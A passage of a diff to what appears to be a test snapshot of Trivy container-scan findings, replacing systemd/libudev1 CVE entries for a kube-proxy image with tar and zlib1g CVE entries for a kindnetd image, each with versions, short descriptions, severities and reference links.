"type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3997", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", + ], + }, + "category": "Vulnerability", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5226-1", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://github.com/curl/curl/issues/9271", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", - ], - }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://support.apple.com/kb/HT213493", + }, + { + "type": "URL", + "value": "https://support.apple.com/kb/HT213494", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5570-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5573-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + }, + { + "type": "URL", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": 